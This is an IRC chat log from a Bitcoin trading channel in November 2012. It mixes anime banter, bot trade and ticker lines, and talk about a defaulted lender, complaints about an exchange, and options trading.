my new job will use git though Nov 16 17:45:21 Im so fresh, hg can suck my nuts Nov 16 17:45:26 I'm not too opinionated on the hg/git divide Nov 16 17:45:33 I mostly prefer git for personal use Nov 16 17:45:51 usagi: AND NO EVA?! Nov 16 17:45:56 you suck at anime forever. Nov 16 17:46:04 BUT THEN WHO WAS PHONE? Nov 16 17:46:50 evangelion Nov 16 17:46:52 NEON GENESIS Nov 16 17:46:57 IT'S LIKE TOTALLY DEEP MAN Nov 16 17:47:03 IT HAS RELIGIOUS REFERENCES AND SHIT Nov 16 17:47:34 cat... girl? Nov 16 17:47:48 eva has no feline females. Nov 16 17:47:53 usagi: EVERYONE DIES IN THE END! Nov 16 17:48:01 or to put it more accurately, they turn into tang. Nov 16 17:48:13 there is no cat girl in evangelion Nov 16 17:48:30 you are. Nov 16 17:48:36 usagi: also, NO TENCHI?! Nov 16 17:48:47 no, no girl who can jump far. Nov 16 17:49:01 there is a lot of anime, and I have seen... well... a fucking lot of it. Nov 16 17:49:54 Ive seen a lot of the classics Nov 16 17:49:57 hell, I watched macross. Nov 16 17:50:01 not robotech, but macross. Nov 16 17:50:12 and yes, the animation falls apart near the end Nov 16 17:50:30 watch full metal alchemist brotherhood Nov 16 17:50:45 put that at the head of your list Nov 16 17:50:58 there are very few animes that I consider 5 stars Nov 16 17:51:03 5 stars means I will watch it again Nov 16 17:51:13 4 merely means I found it worth my time, but not worth watching again Nov 16 17:51:24 fmab is a 5 star. Nov 16 17:51:30 Ive seen black magic m66 Nov 16 17:51:38 yeah, and the original appleseed Nov 16 17:52:19 [MPEX] [S.MPOE] 2645 @ 0.00049612 = 1.3122 BTC [+] Nov 16 17:52:21 [MPEX] [S.MPOE] 24029 @ 0.00049615 = 11.922 BTC [+] Nov 16 17:53:34 I havent Nov 16 17:55:44 heh Nov 16 17:55:49 Ill watch it later Nov 16 17:56:07 busy torrenting kamen rider fourze Nov 16 17:57:38 why wouldnt I watch kamen rider Nov 16 17:59:02 I run miotd.com for christ's sakes Nov 16 18:00:01 which reminds me, I need to do today's image Nov 16 18:00:09 awww a new relationship thanks to #bitcoin-assets Nov 16 18:00:23 pigeons: usagi is already an investor in my company Nov 16 18:00:37 prove it ;) Nov 16 18:00:51 NEFARRRIIIOOOOOOOOOOOOOOOO Nov 16 18:01:23 so should I Nov 16 18:01:28 seaking isnt writing itself Nov 16 18:02:08 [MPEX] [S.MPOE] 18483 @ 0.00049615 = 9.1703 BTC [+] Nov 16 18:02:09 [MPEX] [S.MPOE] 7700 @ 0.0004962 = 3.8207 BTC [+] Nov 16 18:02:10 [MPEX] [S.MPOE] 12217 @ 0.00049622 = 6.0623 BTC [+] Nov 16 18:11:30 [MPEX] [S.MPOE] 2633 @ 0.00049622 = 1.3065 BTC [+] Nov 16 18:11:31 [MPEX] [S.MPOE] 20217 @ 0.00049623 = 10.0323 BTC [+] Nov 16 18:21:29 [MPEX] [S.MPOE] 31757 @ 0.00049623 = 15.7588 BTC [+] Nov 16 18:21:30 [MPEX] [S.MPOE] 3386 @ 0.00049624 = 1.6803 BTC [+] Nov 16 18:31:05 [MPEX] [S.MPOE] 14564 @ 0.00049624 = 7.2272 BTC [+] Nov 16 18:31:06 [MPEX] [S.MPOE] 5717 @ 0.00049624 = 2.837 BTC [+] Nov 16 18:40:32 [MPEX] [S.MPOE] 18 @ 0.00049624 = 0.0089 BTC [+] Nov 16 18:40:33 [MPEX] [S.MPOE] 19800 @ 0.00049624 = 9.8256 BTC [+] Nov 16 18:40:35 [MPEX] [S.MPOE] 18182 @ 0.00049625 = 9.0228 BTC [+] Nov 16 18:50:06 [MPEX] [S.MPOE] 7168 @ 0.00049625 = 3.5571 BTC [+] Nov 16 18:50:06 [MPEX] [S.MPOE] 5782 @ 0.00049628 = 2.8695 BTC [+] Nov 16 18:59:16 [MPEX] [S.MPOE] 4200 @ 0.00049628 = 2.0844 BTC [+] Nov 16 19:03:47 new hampshire population dropping at accelerating rate as millions unable to live free die. Nov 16 19:08:02 https://btcjam.com/listings/584 Nov 16 19:09:35 [MPEX] [S.MPOE] 168 @ 0.00049628 = 0.0834 BTC [+] Nov 16 19:09:36 [MPEX] [S.MPOE] 14400 @ 0.0004963 = 7.1467 BTC [+] Nov 16 19:09:38 [MPEX] [S.MPOE] 11232 @ 0.00049633 = 5.5748 BTC [+] Nov 16 19:18:49 [MPEX] [S.MPOE] 2476 @ 0.00049633 = 1.2289 BTC [+] Nov 16 19:18:51 [MPEX] [S.MPOE] 5808 @ 0.00049635 = 2.8828 BTC [+] Nov 16 19:28:08 [MPEX] [S.MPOE] 15065 @ 0.00049635 = 7.4775 BTC [+] Nov 16 19:28:09 [MPEX] [S.MPOE] 13765 @ 0.00049638 = 6.8327 BTC [+] Nov 16 19:36:07 o/ Nov 16 19:36:19 kakobrekla: oh, that was about that docracy thing Nov 16 19:36:25 \o Nov 16 19:36:30 patrick harnett is scamtagged ?! Nov 16 19:36:48 well, he stopped paying s2cm apparantly Nov 16 19:37:06 got also #1 place in google Nov 16 19:37:13 for scammer tag Nov 16 19:37:31 lol Nov 16 19:37:37 well this went well. time to talk to his professional authority nao. Nov 16 19:38:00 [MPEX] [S.MPOE] 9355 @ 0.00049638 = 4.6436 BTC [+] Nov 16 19:38:02 [MPEX] [S.MPOE] 34745 @ 0.0004964 = 17.2474 BTC [+] Nov 16 19:41:43 ;;ticker Nov 16 19:41:43 BTCUSD ticker | Best bid: 11.72902, Best ask: 11.77990, Bid-ask spread: 0.05088, Last trade: 11.78000, 24 hour volume: 66220.00854085, 24 hour low: 10.94020, 24 hour high: 11.80000, 24 hour vwap: 11.35859 Nov 16 19:41:52 guuuh? Nov 16 19:47:03 smickles aren't you sorry you didn't buy all those btc at 10.02 nao :p Nov 16 19:47:24 [MPEX] [S.MPOE] 11505 @ 0.0004964 = 5.7111 BTC [+] Nov 16 19:47:26 [MPEX] [S.MPOE] 21652 @ 0.00049645 = 10.7491 BTC [+] Nov 16 19:48:07 apparently #bitcoin-otc is obsolete now? http://bitcoinpolice.org/t29-Welcome-BitcoinPolice.org.html Nov 16 19:48:19 heh, maybe i could've setup a synthetic long position Nov 16 19:50:17 jurov: well, schucks Nov 16 19:50:59 ? Nov 16 19:51:31 I liked -otc Nov 16 19:51:58 "Post you shoe-on-head ID photograph here." lmao Nov 16 19:52:20 oh lol, i see that now Nov 16 19:53:15 oh bad form Nov 16 19:53:46 they have 'otc reputation: xxx' next to user names Nov 16 19:53:52 and it's cumulative score Nov 16 19:53:57 badbadbad Nov 16 19:54:03 http://trilema.com/2012/the-patrick-harnett-saga-continues/ Nov 16 19:54:05 moar juicy. Nov 16 19:54:05 i still <3 otc Nov 16 19:54:09 mpoe-pr on them! Nov 16 19:54:43 jurov i think that name is entirely ridiculous Nov 16 19:55:04 whole thing is ridiculous Nov 16 19:55:07 "bitcoin police" heh. why not "bitcoin canadian mounties" Nov 16 19:55:18 they ride on an elk named bit Nov 16 19:56:32 [MPEX] [S.MPOE] 26548 @ 0.00049645 = 13.1798 BTC [+] Nov 16 19:56:34 [MPEX] [S.MPOE] 12400 @ 0.00049647 = 6.1562 BTC [+] Nov 16 19:56:34 [MPEX] [S.MPOE] 4652 @ 0.00049648 = 2.3096 BTC [+] Nov 16 19:57:48 hey MrTiggr, u listening? Nov 16 19:58:01 oooh, getting PH's bosses involved Nov 16 19:58:52 well ofcourse. Nov 16 19:59:44 lol, i go to that srgexpert site, and the very top of the page is a line of text that says "FAIL..." Nov 16 20:00:06 "FAIL (the browser should render some flash content, not this)." << in context Nov 16 20:01:24 yeah Nov 16 20:01:36 kinda funny, i had a chuckle myself. Nov 16 20:03:35 possibly the last thing those people expect to find in their inbox as they go to work monday. Nov 16 20:04:30 ;;ticker Nov 16 20:04:30 BTCUSD ticker | Best bid: 11.69000, Best ask: 11.70000, Bid-ask spread: 0.01000, Last trade: 11.71199, 24 hour volume: 67417.32414705, 24 hour low: 10.94020, 24 hour high: 11.80000, 24 hour vwap: 11.36874 Nov 16 20:05:04 whooop! Nov 16 20:05:41 [MPEX] [S.MPOE] 21000 @ 0.00049648 = 10.4261 BTC [+] Nov 16 20:15:00 [MPEX] [S.MPOE] 2561 @ 0.00049648 = 1.2715 BTC [+] Nov 16 20:15:01 [MPEX] [S.MPOE] 32639 @ 0.00049648 = 16.2046 BTC [+] Nov 16 20:19:01 https://bitcointalk.org/index.php?topic=124441.msg1338371#msg1338371 lol Nov 16 20:21:04 :p Nov 16 20:21:57 heh, it sounded like a good point as i read it, it was jut very humorous too :) Nov 16 20:22:02 https://bitcointalk.org/index.php?topic=124461.msg1339294#msg1339294 Nov 16 20:22:07 Use your brain and third-party reputation services to determine who to trust. Do not rely on the forum itself. The forum staff doesn't spend much time on scam accusations, so the forum does a very poor job of keeping up with scammers. A for-profit company should deal with this stuff. Or at least a non-profit organization of people who are actually interested in spending a lot of time to fight scams (unlike me). Nov 16 20:22:14 the man doth have a point. Nov 16 20:23:43 did 'the girl' point out that post to bitcoininv who claimed to rely on the forum for reputation and shun the WoT? Nov 16 20:23:57 *that's 'World of Tanks' btw ;) Nov 16 20:24:02 i guess she should huh Nov 16 20:24:04 [MPEX] [S.MPOE] 3211 @ 0.00049648 = 1.5942 BTC [+] Nov 16 20:24:06 [MPEX] [S.MPOE] 24900 @ 0.00049656 = 12.3643 BTC [+] Nov 16 20:24:07 [MPEX] [S.MPOE] 9140 @ 0.0004966 = 4.5389 BTC [+] Nov 16 20:24:14 tho i'm sure he has a clever retort. Nov 16 20:24:59 clever is not necessarily reality Nov 16 20:25:11 indeed :p Nov 16 20:34:01 [MPEX] [S.MPOE] 7200 @ 0.0004966 = 3.5755 BTC [+] Nov 16 20:43:05 [MPEX] [S.MPOE] 37017 @ 0.0004966 = 18.3826 BTC [+] Nov 16 20:43:06 [MPEX] [S.MPOE] 11450 @ 0.00049663 = 5.6864 BTC [+] Nov 16 20:43:08 [MPEX] [S.MPOE] 1461 @ 0.00049665 = 0.7256 BTC [+] Nov 16 20:45:02 mircea_popescu: http://www.encyclopediabitcoinica.com/wiki/Smickles Nov 16 20:45:13 suprisingly, not entirely written by me Nov 16 20:52:41 [MPEX] [S.MPOE] 3420 @ 0.00049665 = 1.6985 BTC [+] Nov 16 20:52:42 [MPEX] [S.MPOE] 10530 @ 0.00049667 = 5.2299 BTC [+] Nov 16 21:01:50 [MPEX] [S.MPOE] 10470 @ 0.00049667 = 5.2001 BTC [+] Nov 16 21:01:52 [MPEX] [S.MPOE] 5480 @ 0.00049669 = 2.7219 BTC [+] Nov 16 21:04:14 lord smickles Nov 16 21:04:19 lol Nov 16 21:05:11 mircea_popescu your prediction was correct. Harnett defaulted. would you like your winnings in lollipops? Nov 16 21:11:28 [MPEX] [S.MPOE] 12220 @ 0.00049669 = 6.0696 BTC [+] Nov 16 21:11:29 [MPEX] [S.MPOE] 31030 @ 0.00049674 = 15.4138 BTC [+] Nov 16 21:15:42 harnett made an announcement? Nov 16 21:18:44 actually mircea_popescu predicted that harnett would not default, so mircea deposited coins with patrick. mircea was wrong, patrick did default, and mircea did not get the coins harnett owed him Nov 16 21:21:05 [MPEX] [S.MPOE] 14556 @ 0.00049674 = 7.2305 BTC [+] Nov 16 21:21:06 [MPEX] [S.MPOE] 31255 @ 0.00049677 = 15.5265 BTC [+] Nov 16 21:21:08 [MPEX] [S.MPOE] 4431 @ 0.0004968 = 2.2013 BTC [+] Nov 16 21:22:06 thestringpuller: ^ Nov 16 21:22:09 only a few tho Nov 16 21:22:27 most of my positions are entered into at the beginning of the month Nov 16 21:28:16 what is your premium smickles? Nov 16 21:28:23 < BTCHero> harnett made an announcement? << well, you don't need to make an announcement to default, you just need to not fullfill a contract Nov 16 21:28:39 er, s/contract/obligation/ Nov 16 21:28:52 thestringpuller: on the options? I've listed them on mpex Nov 16 21:29:00 i'll post the link if you want Nov 16 21:29:04 i see Nov 16 21:29:06 them Nov 16 21:29:08 hmm Nov 16 21:29:14 well yeah, I just didn't know if he actually said it Nov 16 21:29:31 funny thing is, he paid me more than I originally gave him before he quit paying Nov 16 21:29:32 can you use what I still have being held with you Nov 16 21:29:33 BTCHero: kk :), i'm mostly a pedant here Nov 16 21:29:38 I was almost closed out Nov 16 21:29:47 ~2 btc with you Nov 16 21:30:14 thestringpuller: yeah, it would be off the mpex books tho Nov 16 21:30:34 [MPEX] [S.MPOE] 27501 @ 0.0004968 = 13.6625 BTC [+] Nov 16 21:30:35 3.3618677 Nov 16 21:30:35 [MPEX] [S.MPOE] 5801 @ 0.0004968 = 2.8819 BTC [+] Nov 16 21:30:43 the that's how much you have with me Nov 16 21:31:38 heh, thestringpuller if we do an otc option, then I can give you a 0.2% discount :) Nov 16 21:32:38 i gained interest? Nov 16 21:32:41 lol Nov 16 21:33:07 thestringpuller: no interest yet Nov 16 21:33:29 it's being rolled out to my larger clients first Nov 16 21:33:38 it cant be that much the 3.36 Nov 16 21:33:46 i was sure it was under 3... Nov 16 21:34:03 how much profit did I make on october's mini crash? Nov 16 21:35:47 ah, 2.586072 Nov 16 21:35:54 i copied the wrong box Nov 16 21:36:07 that's better Nov 16 21:36:08 it was 3.~ before you received your profits Nov 16 21:39:48 [MPEX] [S.MPOE] 20956 @ 0.0004968 = 10.4109 BTC [+] Nov 16 21:40:40 i got hosed speculating on s.mpoe Nov 16 21:41:02 someone sold a lot one day and cut into all my profits lol Nov 16 21:41:03 you were short at .00038? Nov 16 21:41:19 Oh, bad luck i guess Nov 16 21:41:30 .000507~ Nov 16 21:41:32 yea Nov 16 21:41:49 not as bad as the money usagi lost people Nov 16 21:41:55 Although I like mpex, and think it is worthwhile, the implied valuation of it boggles my mind Nov 16 21:48:59 [MPEX] [S.MPOE] 16743 @ 0.0004968 = 8.3179 BTC [+] Nov 16 21:49:00 [MPEX] [S.MPOE] 557 @ 0.00049713 = 0.2769 BTC [+] Nov 16 21:57:00 what is the implied valuation? Nov 16 21:58:05 [MPEX] [S.MPOE] 16121 @ 0.00049713 = 8.0142 BTC [+] Nov 16 21:58:06 [MPEX] [S.MPOE] 7779 @ 0.00049717 = 3.8675 BTC [+] Nov 16 21:58:27 ;;calc 1000000000 * .00049717 Nov 16 21:58:27 497170 Nov 16 21:58:33 Diablo-D3: ^ in btc Nov 16 21:58:58 jesus what Nov 16 21:59:12 yeah, you see why mircea_popescu is all cocky Nov 16 21:59:14 its not worth that Nov 16 21:59:18 not even close Nov 16 21:59:28 cocky? dude, he should be afraid he isnt murdered in his sleep Nov 16 21:59:50 mircea_popescu: ;) Nov 16 22:00:21 Diablo-D3: well, i dunno, i had heard rumors that he was an assasian in the revolution Nov 16 22:00:35 dude, everyone was an assassin in the revolution Nov 16 22:02:48 Diablo-D3: so your imaginary would-be-murderer's plan is to kill him in his sleep and what? steal an encrypted private key? Nov 16 22:02:52 any response from icbit yet btw? Nov 16 22:03:02 kakobrekla: i've got one Nov 16 22:03:09 yes? Nov 16 22:03:15 Hm, we did not get any more such reports. Sometimes a problem with updating data happens, but it's the first time I hear about "updating is good, but order placement does not work". Nov 16 22:03:19 Ok, please use the service as usual, however if you notice problems again - let me know, and then we will try to investigate it thoroughly. Nov 16 22:03:23 Thanks, Nov 16 22:03:25 Alex Nov 16 22:03:34 In responce to my support request Nov 16 22:03:47 aha Nov 16 22:04:01 well dunno Nov 16 22:04:09 what to make of it Nov 16 22:04:23 got another 200 brc? Nov 16 22:04:27 *btc Nov 16 22:04:43 i read it as "i don't log when someone places an order" Nov 16 22:05:02 heh, kakobrekla, well, the cynical me took it as "heh, well, keep trying, we'll keep taking your btc" Nov 16 22:05:13 and if such is true that is criminal negligence Nov 16 22:05:26 isnt tycho invloved in this? Nov 16 22:05:33 yup Nov 16 22:05:50 it makes little sense to scam like that while he runs deepbit Nov 16 22:06:06 not worth the effort or something Nov 16 22:06:37 as the saying goes, don't assume malice in something that can be explained by incompetence Nov 16 22:06:42 yeah, i'm not actually sure what to make of it all anyway Nov 16 22:07:09 [MPEX] [S.MPOE] 24921 @ 0.00049717 = 12.39 BTC [+] Nov 16 22:07:10 oh well. bbl Nov 16 22:07:11 [MPEX] [S.MPOE] 5129 @ 0.00049732 = 2.5508 BTC [+] Nov 16 22:07:31 but it would've been nice to have my 50 btc woth of BUZ2 quoted at 10.01 right now Nov 16 22:07:39 ;;ticker Nov 16 22:07:40 BTCUSD ticker | Best bid: 11.56810, Best ask: 11.60000, Bid-ask spread: 0.03190, Last trade: 11.60000, 24 hour volume: 69132.05325642, 24 hour low: 10.94020, 24 hour high: 11.80000, 24 hour vwap: 11.38965 Nov 16 22:08:22 smickles, really, if he hasn't any evidence that you tried to place an order, that is inexcusable Nov 16 22:08:54 ;;calc ((1/11.56-1/10.01)*-10)*(50/.15) Nov 16 22:08:54 44.6496986289 Nov 16 22:09:10 potentially would've nearly doubled my btc there :( Nov 16 22:09:30 [03:02:52] Diablo-D3: so your imaginary would-be-murderer's plan is to kill him in his sleep and what? steal an encrypted private key? Nov 16 22:09:33 no, just to do it Nov 16 22:09:40 some people just want to watch the world lulz. Nov 16 22:09:45 (assuming gox closes at 11.56 on dec 15) Nov 16 22:10:14 what if he has the key only in memory? Nov 16 22:10:56 you better do some research first :P Nov 16 22:11:05 jurov: well, i'm in a bit of a pickle, 'cause i can't get my btc off of there without taking such a huge loss on the contracts that I may as well just keep it there Nov 16 22:12:03 but if they are completly legit, and this was just some aweful error, and btc is anything above 10.6 at settlement, it ends well for me Nov 16 22:12:14 *10.6 is a rough estimate Nov 16 22:13:13 so they did not figure out to this moment whether you did place an order or not? Nov 16 22:13:39 what i posted here was the last communication I've had from them Nov 16 22:13:52 essentially, "thanks for playing, good luck next time" Nov 16 22:14:05 Nov 16 22:15:50 like, wtf? they're using monkeys with excel for database? Nov 16 22:16:00 like nefario? Nov 16 22:16:01 excel isn't that bad Nov 16 22:16:05 it has a search function Nov 16 22:16:27 [MPEX] [S.MPOE] 36850 @ 0.00049732 = 18.3262 BTC [+] Nov 16 22:16:33 okay, let it be mokeys with typewriters Nov 16 22:16:41 *monkeys Nov 16 22:16:42 tyvm :) Nov 16 22:17:06 although, personally, i use libreoffice's calc Nov 16 22:19:04 smickles, i'd suggest to sell that account to someone and forget icbit Nov 16 22:20:24 if they have problems to find orders... and they didn't even close yet Nov 16 22:20:35 holy fucking shit!!!!!!!!!!!11 Nov 16 22:20:45 the orderbook is down to 9.5 best bid Nov 16 22:20:57 with a volume of 3 contracts to be sold out Nov 16 22:22:17 http://polimedia.us/dtng/c/src/135309731595.png Nov 16 22:22:19 ^^ Nov 16 22:22:24 seriously bad Nov 16 22:25:46 [MPEX] [S.MPOE] 20550 @ 0.00049732 = 10.2199 BTC [+] Nov 16 22:31:35 mr. smickles Nov 16 22:31:52 Nov 16 22:31:52 Nov 16 22:31:53 mr. thestringpuller Nov 16 22:31:54 Nov 16 22:31:59 blank lines? Nov 16 22:32:10 doesnt have the same ring as mr smickles ;) Nov 16 22:32:24 thanks for the compliment :D Nov 16 22:32:35 how about: Nov 16 22:32:40 shemale thestringpuller Nov 16 22:33:04 I kid, I kid ;) Nov 16 22:34:10 lol Nov 16 22:34:24 thestringpuller: my bad joke aside, did you really mean those 3 blank lines as some kind of significant communication? Nov 16 22:34:26 210000 blocks is reward drop non? Nov 16 22:34:35 something like that Nov 16 22:34:39 ;;bc,stats Nov 16 22:34:39 im typing with thumbs Nov 16 22:34:54 gribble: you poop Nov 16 22:34:59 [MPEX] [S.MPOE] 6171 @ 0.00049732 = 3.069 BTC [+] Nov 16 22:34:59 Error: invalid syntax (, line 1) Nov 16 22:35:01 [MPEX] [S.MPOE] 12550 @ 0.00049748 = 6.2434 BTC [+] Nov 16 22:35:01 [MPEX] [S.MPOE] 9429 @ 0.00049762 = 4.6921 BTC [+] Nov 16 22:35:13 ;;bc,stats Nov 16 22:35:39 Error: invalid syntax (, line 1) Nov 16 22:35:59 1.5 weeks till reward drop Nov 16 22:36:09 208220, Nov 16 22:36:10 let the price explosion begin Nov 16 22:36:16 that's the current height Nov 16 22:36:33 210k is first reward drop right? Nov 16 22:37:05 ;;calc (208220 - 210000) * 10 / 60 / 24 Nov 16 22:37:05 -12.3611111111 Nov 16 22:37:26 ;;calc (210000 - 208220) * 10 / 60 / 24 / 7 Nov 16 22:37:26 1.76587301587 Nov 16 22:37:31 it begins Nov 16 22:37:32 1.7~ weeks Nov 16 22:37:51 sell puts!!!! buy calls!!!! Nov 16 22:38:21 if you think it's going over 14 soon, buy the call i'm selling Nov 16 22:38:37 can i put up btc up for you to write puts on my behalf? Nov 16 22:39:04 sure Nov 16 22:39:24 can i piggy back on your underwriting model :) Nov 16 22:40:35 you want to sell o.btcusd.p120t where the breakeven is a spot of 14 usd? Nov 16 22:41:29 *sell to open, that is Nov 16 22:41:52 I have a little over 9 btc free in the account now, Nov 16 22:42:18 and you could also use options that I have surety for if you like their strikes Nov 16 22:42:25 but I don't have too many of those Nov 16 22:42:37 any more than that and we'd need to work a deposit thru Nov 16 22:43:55 or hey, jurov do you have any spare btc on MPEx? Nov 16 22:44:09 yes, few Nov 16 22:44:50 lemme move some cash around after work i dont think wav is gonna hit past 11 tonight Nov 16 22:44:51 thestringpuller: i'm sure i could borrow a few btc to cover it while we wait for the deposit to go thru Nov 16 22:45:30 ;;ticker Nov 16 22:45:30 BTCUSD ticker | Best bid: 11.61492, Best ask: 11.62912, Bid-ask spread: 0.01420, Last trade: 11.65637, 24 hour volume: 69231.58080716, 24 hour low: 10.95151, 24 hour high: 11.80000, 24 hour vwap: 11.39581 Nov 16 22:45:41 [MPEX] [S.MPOE] 6621 @ 0.00049762 = 3.2947 BTC [+] Nov 16 22:45:42 [MPEX] [S.MPOE] 23679 @ 0.00049786 = 11.7888 BTC [+] Nov 16 22:45:49 ;;bc,24hprc Nov 16 22:45:50 11.36 Nov 16 22:46:43 ;;calc 1.09 ** (1/12) Nov 16 22:46:44 1.00720732332 Nov 16 22:47:24 er Nov 16 22:47:49 ;;calc 2.08 ** (1/12) Nov 16 22:47:49 1.06293150084 Nov 16 22:48:44 i have 6BTC free Nov 16 22:48:49 at mpex Nov 16 22:49:49 jurov: thanks for the info. We'll see what the puller wants to do Nov 16 22:50:14 ;;calc (1.09 / 1) ** (1 / (1 /12)) - 1 Nov 16 22:50:14 1.81266478178 Nov 16 22:51:47 12* not 11 Nov 16 22:52:21 ah Nov 16 22:54:44 [MPEX] [S.MPOE] 1871 @ 0.00049786 = 0.9315 BTC [+] Nov 16 22:54:46 [MPEX] [S.MPOE] 40950 @ 0.0004992 = 20.4422 BTC [+] Nov 16 22:54:47 [MPEX] [S.MPOE] 9401 @ 0.00049937 = 4.6946 BTC [+] Nov 16 22:58:15 thestringpuller: you say we may do this when you get home from work? what time is that? Nov 16 22:59:27 after 2100 utc Nov 16 23:01:10 yea roughly that Nov 16 23:01:33 i might recover my mpoe losses if it continues to increase Nov 16 23:01:52 after 2100 utc is already Nov 16 23:02:17 heh yeah, but add a drive home Nov 16 23:02:21 oh Nov 16 23:02:31 2101 Nov 16 23:02:38 2300 Nov 16 23:02:47 is when i will be at a computer Nov 16 23:04:12 [MPEX] [S.MPOE] 40326 @ 0.00049937 = 20.1376 BTC [+] Nov 16 23:04:14 [MPEX] [S.MPOE] 6324 @ 0.00049948 = 3.1587 BTC [+] Nov 16 23:11:12 i dont think anyone will buy my puts in this climate Nov 16 23:12:49 it's worth a shot tho, imo Nov 16 23:13:32 [MPEX] [S.MPOE] 38676 @ 0.00049948 = 19.3179 BTC [+] Nov 16 23:13:33 [MPEX] [S.MPOE] 2459 @ 0.00050084 = 1.2316 BTC [+] Nov 16 23:13:37 better to buy calls and pray no? Nov 16 23:17:50 lol,playing satoshidice is easier than to guess this Nov 16 23:18:23 i think if btcusd goes above 13, someone will make a dump again Nov 16 23:18:37 more payoff here Nov 16 23:18:49 and more data for creating trends Nov 16 23:19:09 lol, data creating trends Nov 16 23:19:35 life imitates art, i say ! Nov 16 23:19:47 lololol Nov 16 23:22:42 [MPEX] [S.MPOE] 3891 @ 0.00050084 = 1.9488 BTC [+] Nov 16 23:22:43 [MPEX] [S.MPOE] 25809 @ 0.00050096 = 12.9293 BTC [+] Nov 16 23:32:33 [MPEX] [S.MPOE] 4191 @ 0.00050096 = 2.0995 BTC [+] Nov 16 23:32:34 [MPEX] [S.MPOE] 24709 @ 0.00050104 = 12.3802 BTC [+] Nov 16 23:40:10 woah, icbit logs arn't persistent? Nov 16 23:40:25 my settlement numbers just changed today Nov 16 23:40:53 earlier, the close was marked at 10.11897 Nov 16 23:41:07 now that entry is gone Nov 16 23:41:36 replaced by an entry dated 1.5 hours later, close market at 10.8088 Nov 16 23:42:03 [MPEX] [S.MPOE] 14591 @ 0.00050104 = 7.3107 BTC [+] Nov 16 23:42:04 [MPEX] [S.MPOE] 9350 @ 0.00050119 = 4.6861 BTC [+] Nov 16 23:42:05 [MPEX] [S.MPOE] 9452 @ 0.00050122 = 4.7375 BTC [+] Nov 16 23:48:50 ;;ticker Nov 16 23:48:51 BTCUSD ticker | Best bid: 11.64980, Best ask: 11.64981, Bid-ask spread: 0.00001, Last trade: 11.64980, 24 hour volume: 69363.84693093, 24 hour low: 11.00000, 24 hour high: 11.80000, 24 hour vwap: 11.41240 Nov 16 23:50:54 jurov: https://bitcointalk.org/index.php?topic=50817.msg1339866#msg1339866 Nov 16 23:51:38 [MPEX] [S.MPOE] 29067 @ 0.00050122 = 14.569 BTC [+] Nov 16 23:51:40 [MPEX] [S.MPOE] 7933 @ 0.00050122 = 3.9762 BTC [+] Nov 16 23:54:04 >_> looks like i missed an exciting anime discussion ;_; Nov 17 00:00:47 [MPEX] [S.MPOE] 36667 @ 0.00050122 = 18.3782 BTC [+] Nov 17 00:00:49 [MPEX] [S.MPOE] 12033 @ 0.00050123 = 6.0313 BTC [+] Nov 17 00:10:04 [MPEX] [S.MPOE] 8224 @ 0.00050123 = 4.1221 BTC [+] Nov 17 00:10:05 [MPEX] [S.MPOE] 5705 @ 0.00050123 = 2.8595 BTC [+] Nov 17 00:21:07 [MPEX] [S.MPOE] 4895 @ 0.00050123 = 2.4535 BTC [+] Nov 17 00:21:09 [MPEX] [S.MPOE] 33605 @ 0.00050126 = 16.8448 BTC [+] Nov 17 00:30:21 [MPEX] [S.MPOE] 51216 @ 0.00050126 = 25.6725 BTC [+] Nov 17 00:30:22 [MPEX] [S.MPOE] 2034 @ 0.00050127 = 1.0196 BTC [+] Nov 17 00:40:12 [MPEX] [S.MPOE] 13414 @ 0.00050127 = 6.724 BTC [+] Nov 17 00:40:14 [MPEX] [S.MPOE] 6886 @ 0.00050128 = 3.4518 BTC [+] Nov 17 00:40:29 wow, someone got real craving for s,.mpoe? Nov 17 00:50:25 [MPEX] [S.MPOE] 14714 @ 0.00050128 = 7.3758 BTC [+] Nov 17 00:50:27 [MPEX] [S.MPOE] 24286 @ 0.00050131 = 12.1748 BTC [+] Nov 17 00:59:39 [MPEX] [S.MPOE] 6014 @ 0.00050131 = 3.0149 BTC [+] Nov 17 00:59:40 [MPEX] [S.MPOE] 11238 @ 0.00050134 = 5.6341 BTC [+] Nov 17 00:59:41 [MPEX] [S.MPOE] 15848 @ 0.00050135 = 7.9454 BTC [+] Nov 17 01:08:49 [MPEX] [S.MPOE] 14052 @ 0.00050135 = 7.045 BTC [+] Nov 17 01:08:50 [MPEX] [S.MPOE] 13600 @ 0.00050137 = 6.8186 BTC [+] Nov 17 01:08:51 [MPEX] [S.MPOE] 3048 @ 0.00050141 = 1.5283 BTC [+] Nov 17 01:18:42 [MPEX] [S.MPOE] 12600 @ 0.00050141 = 6.3178 BTC [+] Nov 17 01:18:43 [MPEX] [S.MPOE] 32300 @ 0.00050141 = 16.1955 BTC [+] Nov 17 01:28:15 [MPEX] [S.MPOE] 32152 @ 0.00050141 = 16.1213 BTC [+] Nov 17 01:28:17 [MPEX] [S.MPOE] 6199 @ 0.00050142 = 3.1083 BTC [+] Nov 17 01:37:32 [MPEX] [S.MPOE] 8550 @ 0.00050142 = 4.2871 BTC [+] Nov 17 01:46:42 [MPEX] [S.MPOE] 34001 @ 0.00050142 = 17.0488 BTC [+] Nov 17 01:46:43 [MPEX] [S.MPOE] 6999 @ 0.00050142 = 3.5094 BTC [+] Nov 17 01:57:40 [MPEX] [S.MPOE] 13564 @ 0.00050142 = 6.8013 BTC [+] Nov 17 02:03:03 hi all... Nov 17 02:03:52 funny thing is, he paid me more than I originally gave him before he quit paying <<< omg clawback Nov 17 02:05:10 https://bitcointalk.org/index.php?topic=50817.msg1339857#msg1339857 <<< lmao. apparently after the piece on trilema icbit price suddenly moved a dollar. Nov 17 02:05:12 ahahah Nov 17 02:05:42 kakobrekla ^^ Nov 17 02:07:15 so they did not figure out to this moment whether you did place an order or not? << this is exactly why the website model does not work too well for exchanges Nov 17 02:07:27 "i did so place an order!" "no you did not!!!" is bs. show me your signed receipt ? Nov 17 02:07:30 that's the way to do it. Nov 17 02:07:45 [MPEX] [S.MPOE] 15737 @ 0.00050142 = 7.8908 BTC [+] Nov 17 02:07:45 [MPEX] [S.MPOE] 17499 @ 0.00050144 = 8.7747 BTC [+] Nov 17 02:10:29 smickles Nov 17 02:10:35 or should i say mr. smickles Nov 17 02:10:46 I'm finally at a machine, as you can see I am typing much faster Nov 17 02:11:17 mircea_popescu: So you lived the revolution of 89. I had a good friend who was conceived during that revolution... Nov 17 02:11:31 i disclaim any liability.\ Nov 17 02:11:51 it would be a very small world now wouldn't it Nov 17 02:13:22 smickles: I want to sell puts... Nov 17 02:13:31 ;;ticker Nov 17 02:13:31 BTCUSD ticker | Best bid: 11.73780, Best ask: 11.73800, Bid-ask spread: 0.00020, Last trade: 11.73780, 24 hour volume: 58210.62028898, 24 hour low: 11.17500, 24 